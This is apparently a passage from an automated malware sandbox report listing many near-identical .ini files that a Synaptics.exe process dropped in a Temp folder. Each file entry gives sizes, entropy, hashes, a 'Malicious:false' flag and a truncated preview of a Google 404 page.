                                                                                                                                                                                        Preview:<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="AlUf5SZX8HHBquYleAsvKQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) n

                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\nULp3tm.ini

                                                                                                                                                                                        Download File
                                                                                                                                                                                        Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        File Type:HTML document, UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):1642
                                                                                                                                                                                        Entropy (8bit):5.277420645134154
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:24:bsF+0YSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:bK+D+pAZewRDK4mW
                                                                                                                                                                                        MD5:30A6822256DD2063E1EE23E9AC67DB5E
                                                                                                                                                                                        SHA1:82FBD5326E9EC89EA4C8FA17EBCFAE8893D33080
                                                                                                                                                                                        SHA-256:3675693EC439B60862857A8E0261164E9D56FCD9F692BD027F4A6F5023F687FB
                                                                                                                                                                                        SHA-512:97DB93A6DA8309FF59D35FF2C010471EC349666385F5915784A5CC24B69F9E0D1D02511BC296535EEF185A8EF7A6D1D5ACAC7F74594A0A83B292CE4CE951628F
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="0/hIj69dXMJRZ4TCIiQMEQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) n

                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\nX6U6A4.ini

                                                                                                                                                                                        Download File
                                                                                                                                                                                        Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        File Type:HTML document, UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):1642
                                                                                                                                                                                        Entropy (8bit):5.256251612112261
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:24:bsF+0iISU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:bK+bI+pAZewRDK4mW
                                                                                                                                                                                        MD5:C5B3FBC4A13EBF75DFDC787B588FBD98
                                                                                                                                                                                        SHA1:7B5D913CE024E26C8EED6361FE104C04160127CD
                                                                                                                                                                                        SHA-256:724DD41F32FEB6F934E9C02091813B821B49D6F7AA401FD7E9BFE48B9D32AF80
                                                                                                                                                                                        SHA-512:05EE55703FAF3E9ACA49A77B8CC26EA72B7D261814AC7567019CA20A0D45364A5B50D1A8742526AF18C63963C53E459609560603ED1185E2EFB0340F5746A095
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="4OiCtT/rM/qjm2I42V24Lg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) n

                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\naLPTZg.ini

                                                                                                                                                                                        Download File
                                                                                                                                                                                        Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        File Type:HTML document, UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):1642
                                                                                                                                                                                        Entropy (8bit):5.264911904542635
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:24:bsF+0ASU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:bK+b+pAZewRDK4mW
                                                                                                                                                                                        MD5:D9912D0BA88A7025F07B5D576F79067C
                                                                                                                                                                                        SHA1:3432D47ACEA2F3D45983CC883B3BF9D6F60463C4
                                                                                                                                                                                        SHA-256:E6197E78590737AF47BD41E28D6F84A5CC4722E741A3B643FDAD3F147BA6C026
                                                                                                                                                                                        SHA-512:32E1F9D366A4915D7B3D24A66FFCBC44096EFDC08B7F36A1AABDEAA1CC6F9326D0104B0D57C1E41795F6602C95469B5DB1E1EEA46E5E1823FBB1239E8E55D840
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="gMbAREMYSn0R0L5mSm6YpQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) n

                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\nvTOkaY.ini

                                                                                                                                                                                        Download File
                                                                                                                                                                                        Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        File Type:HTML document, UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):1642
                                                                                                                                                                                        Entropy (8bit):5.262082090150482
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:24:bsF+0XpzSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:bK+6pz+pAZewRDK4mW
                                                                                                                                                                                        MD5:8CFBE8F1C028ADC1955B30EE7C99FE06
                                                                                                                                                                                        SHA1:7CC34F2E0B4A95E1868D58F55A4910CA3CC844D8
                                                                                                                                                                                        SHA-256:638255706AC24675E71ABA635A18A042B9F64733DA1D22CA23808DD5C97C9C94
                                                                                                                                                                                        SHA-512:BA7D31F49CC7C9700A7468E738E3DDE7D5855D32775AC3E9FC0DD27052C6312FB20528DD4D9929F4565CB0D71C740E0A082ECE6589CFA015944C5C60EDFE9D38
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="0Limn3yRe+4WLk8AbmEPjA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) n

                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\o2UVU2v.ini

                                                                                                                                                                                        Download File
                                                                                                                                                                                        Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        File Type:HTML document, UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):1642
                                                                                                                                                                                        Entropy (8bit):5.280330317537105
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:24:bsF+0/xDSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:bK+G+pAZewRDK4mW
                                                                                                                                                                                        MD5:AB8ED41BC3122F17922B5E11DE1E37FC
                                                                                                                                                                                        SHA1:F24EE9400A7F8C25DEDD789C32A360F84632D83B
                                                                                                                                                                                        SHA-256:573D3EA284E7E69BCFBB80BEE78848B98C5D53C947268F001CAF9115A38D3470
                                                                                                                                                                                        SHA-512:F93FDBD757C4F647ACF8BDACB486DE314BDB0B362B52DD021B9E03BFB9496008491673E3A67B1061DC45090A08069EA2FB61F3322312308445BE974463FCE8CA
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="AKXjfLYIvSPX5jLvLtFkLA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) n

                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\oWZMe6e.ini

                                                                                                                                                                                        Download File
                                                                                                                                                                                        Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        File Type:HTML document, UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):1642
                                                                                                                                                                                        Entropy (8bit):5.258657011020209
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:24:bsF+0ObwSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:bK+g+pAZewRDK4mW
                                                                                                                                                                                        MD5:E574551244668B16D3D196C1135B345B
                                                                                                                                                                                        SHA1:8A85FE210A10C4E233CA0C5A42390395760E1CCF
                                                                                                                                                                                        SHA-256:F8892985EF9BF51238AF910E959C1A7EBFA1DF70073588013CE72EC548F2404E
                                                                                                                                                                                        SHA-512:3C9A231C7AAA57CB37266A72F1D6017C99307092A17E9D5AA2865F304C4CEC22DCAA2EC2B6A0E3E9013DF4D606569BDB40D3FAFE8471C54C3B7ACD6066FD0C9C
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="EAEKHq/Lmsr/aTqEkQX4ag">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) n

                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\qD7BAEc.ini

                                                                                                                                                                                        Download File
                                                                                                                                                                                        Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        File Type:HTML document, UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):1642
                                                                                                                                                                                        Entropy (8bit):5.264196787529873
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:24:bsF+0TaDSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:bK+J+pAZewRDK4mW
                                                                                                                                                                                        MD5:8A7799DDEC4BFD4FD4429E25521DD4DD
                                                                                                                                                                                        SHA1:1EF8C15141485415CCB6C7DE8A817CB2EAC65285
                                                                                                                                                                                        SHA-256:865A64EFEAE7254C31BB22ADFC0330B26D6B4E57AB706377BB93F6784F4CB378
                                                                                                                                                                                        SHA-512:66FD51F9D5AB71AE27B5EE624C8FF7110CBB6E83E1469E92A9E5C253E82FEE8D7D007323459F6523F0613334A28DC040C906DD4FC4463F3717466D3AD7322F6E
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="e4gqe587EQSPOoJjuC+aSg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) n

                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\qmqFANu.ini

                                                                                                                                                                                        Download File
                                                                                                                                                                                        Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        File Type:HTML document, UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):1642
                                                                                                                                                                                        Entropy (8bit):5.268766699592682
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:24:bsF+00eHSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:bK+2H+pAZewRDK4mW
                                                                                                                                                                                        MD5:D323E9A2DDD67357D1A4628CD3F1DA8C
                                                                                                                                                                                        SHA1:1C20A5004E79906292F716450987104EB8BB02E0
                                                                                                                                                                                        SHA-256:EA3BC66A1BD86C76CBE68565E8CC4F969502672E1DB1C51E52E005A1474AD55C
                                                                                                                                                                                        SHA-512:B0C97D3E81A6731BB4EC7FE531B3DB68292511169BFF9D80986B08415207E5EEFC46DF31078098BD6BD3E87D17FB849B54E87E7A3F34332E62986B896659042E
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="spyQJKJxWbYZ6SivHf5yeQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) n

                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\qprUynp.ini

                                                                                                                                                                                        Download File
                                                                                                                                                                                        Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        File Type:HTML document, UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):1642
                                                                                                                                                                                        Entropy (8bit):5.271545187444364
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:24:bsF+0cESU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:bK+u+pAZewRDK4mW
                                                                                                                                                                                        MD5:0F3C37AB52CBF28A082FACB90B7AE3F3
                                                                                                                                                                                        SHA1:66333AD967736AEDDD96082531376CE4FCAD1920
                                                                                                                                                                                        SHA-256:0A8452A96DCD93DFF5525EEB139E79E8C5F81EE11A419272D9FCD5C00E5F4252
                                                                                                                                                                                        SHA-512:1E3AE83817AA7AE8F536CA4FA027AF5024FEC074DA8D22C5BCD27C992A8505C7AEF0593E7BFC775718E17C7A3F8C44A0CEBC89C0D385BBB839A61AFE13AA79E9
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="Vo+7Xj84tSgaQZO6MHuQrw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) n

                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\rDEDK5n.ini

                                                                                                                                                                                        Download File
                                                                                                                                                                                        Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        File Type:HTML document, UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):1642
                                                                                                                                                                                        Entropy (8bit):5.264550096592073
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:24:bsF+0yvISU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:bK+dvI+pAZewRDK4mW
                                                                                                                                                                                        MD5:8AA752DF6D4E525E1FDE14A5F6FCB0AF
                                                                                                                                                                                        SHA1:3D0404FFA3041D9E9F44A14E6C5FAD190C1DB98B
                                                                                                                                                                                        SHA-256:3D0D103D3C73020877BA59E502FA23D8BD43EEEF22185AEC9565540E5FF9630E
                                                                                                                                                                                        SHA-512:DD648CAE8B9BD9B4774399026E41A7D55541E50FD02B225F89FDFD2016486666BC6D9765B04C0CB74E72732EB41B45105BA37D6BE43062FE655DB29657EE0EDA
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="zoh7vAFCpKuV2UKTuYArHg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) n

                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\rcZzzAs.ini

                                                                                                                                                                                        Download File
                                                                                                                                                                                        Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        File Type:HTML document, UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):1642
                                                                                                                                                                                        Entropy (8bit):5.268559278606647
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:24:bsF+0ifSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:bK+9f+pAZewRDK4mW
                                                                                                                                                                                        MD5:0AA9AA85BD78937515A3345D6B4C1C7F
                                                                                                                                                                                        SHA1:03DADBE2649E5029AED958511AD8EE17EB33B4E9
                                                                                                                                                                                        SHA-256:F393A1A170C580F5A47191F79E416185EABC8C5A6969AAF55D94DAE18E4C33C4
                                                                                                                                                                                        SHA-512:16A0DA35B2825F19CE3E5CA1E3E4787A451799410AF008C8789D8986984C7B007CDD85EBAFC1FCC0F6EA621B6E46A69236B90D3C79D6036B030480CCC7B6C42A
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="7QpI112PGkomKM/+vZV1ZA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) n

                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\rgDn6Rl.ini

                                                                                                                                                                                        Download File
                                                                                                                                                                                        Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        File Type:HTML document, UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):1642
                                                                                                                                                                                        Entropy (8bit):5.24882100430999
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:24:bsF+0J5SU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:bK+w5+pAZewRDK4mW
                                                                                                                                                                                        MD5:7B94997670BFA7A69ED362C3203B4262
                                                                                                                                                                                        SHA1:B10F5B0932D4F1049FFD507893B94317C2578101
                                                                                                                                                                                        SHA-256:BD01C93808C684D1E882405FDC209168F7CF713D19CCF0B6C58C0FC8FA8E07A6
                                                                                                                                                                                        SHA-512:BF7474A430B55AA5B61CAA2B0067E689B6725BAC4766E1B85E9F624385FD6A585F1D7889721E4AF0FF190790D1F6C3BE980D88E1DE26F4F58AD4E06DAF814BB8
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="WD2eZsYxSaBnspF4savtlw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) n

                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\riQc5Bg.ini

                                                                                                                                                                                        Download File
                                                                                                                                                                                        Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        File Type:HTML document, UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):1642
                                                                                                                                                                                        Entropy (8bit):5.259043010214964
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:24:bsF+056SU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:bK+L+pAZewRDK4mW
                                                                                                                                                                                        MD5:A8DA6E346A825B7375A1A2582591960B
                                                                                                                                                                                        SHA1:D2A46B14B69ACAE47F6E19CC43D702BB64750E8A
                                                                                                                                                                                        SHA-256:036BFD5E470B87A0628B29CF25AA78885045E1E9A18FFD592E1FAEBD15401860
                                                                                                                                                                                        SHA-512:AD0E35219849F1335BEFFDA99EA4588A7BB47AE6D55551BCB6E52B5429682769CEED1FAD9553D478205D911F5CB1CA3FDD442F27B00721BAE61E104DF34AEDBF
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="roRixh3F8PpkqI9JAcxQnQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) n

                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\s2C66nT.ini

                                                                                                                                                                                        Download File
                                                                                                                                                                                        Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        File Type:HTML document, UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):1642
                                                                                                                                                                                        Entropy (8bit):5.25573032394871
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:24:bsF+0zSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:bK+0+pAZewRDK4mW
                                                                                                                                                                                        MD5:769349D166D7A35E25126A344E1E3553
                                                                                                                                                                                        SHA1:7DC69EF56CF9549EC5F87F4AA845D6664C7A5F00
                                                                                                                                                                                        SHA-256:7D3D772AA9BEC089DB20C9E9B3C33555E3A2E512E5BBA270BC6FA0D6B018AD97
